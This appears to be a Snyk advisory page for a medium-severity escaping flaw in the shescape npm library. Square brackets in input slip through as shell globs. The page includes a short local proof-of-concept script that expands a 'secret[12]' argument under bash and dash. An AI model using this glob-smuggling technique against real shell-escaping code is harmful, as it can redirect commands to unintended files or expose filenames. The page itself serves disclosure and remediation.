Find, fix and prevent vulnerabilities in your code.
medium severity
new
- Vulnerable module: shescape
- Introduced through: shescape@2.1.6
Detailed paths
-
Introduced through: @snyk/snyk-cocoapods-plugin@snyk/snyk-cocoapods-plugin#e3dd781f0638a082346d557a5253453fb59bedae › shescape@2.1.6Remediation: Upgrade to shescape@2.1.10.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output in the escape function. An attacker can cause unintended expansion of shell arguments by supplying input containing square brackets, which may result in multiple filesystem matches being processed instead of a single literal argument. This can lead to changes in command behavior, targeting of unintended files, or exposure of filenames when the output is used in shell commands.
PoC
tmp=$(mktemp -d)
cd "$tmp"
npm pack shescape@2.1.9 >/dev/null
mkdir pkg
tar -xzf shescape-2.1.9.tgz -C pkg
cd pkg/package
npm install --omit=dev
node --input-type=module - <<'NODE'
import { mkdtempSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import path from "node:path";
import { execSync } from "node:child_process";
import { Shescape } from "./src/index.js";
const dir = mkdtempSync(path.join(tmpdir(), "shescape-ghsa-poc-"));
writeFileSync(path.join(dir, "secret1"), "");
writeFileSync(path.join(dir, "secret2"), "");
for (const shell of ["/usr/bin/bash", "/usr/bin/dash"]) {
const shescape = new Shescape({ shell });
const escaped = shescape.escape("secret[12]");
console.log(${shell} escaped=${escaped});
const out = execSync(printf '<%s>\\n' ${escaped}, { cwd: dir, shell }).toString();
process.stdout.write(out);
}
NODE
Remediation
Upgrade shescape to version 2.1.10 or higher.
References
medium severity
- Module: shescape
- Introduced through: shescape@2.1.6
Detailed paths
-
Introduced through: @snyk/snyk-cocoapods-plugin@snyk/snyk-cocoapods-plugin#e3dd781f0638a082346d557a5253453fb59bedae › shescape@2.1.6
MPL-2.0 license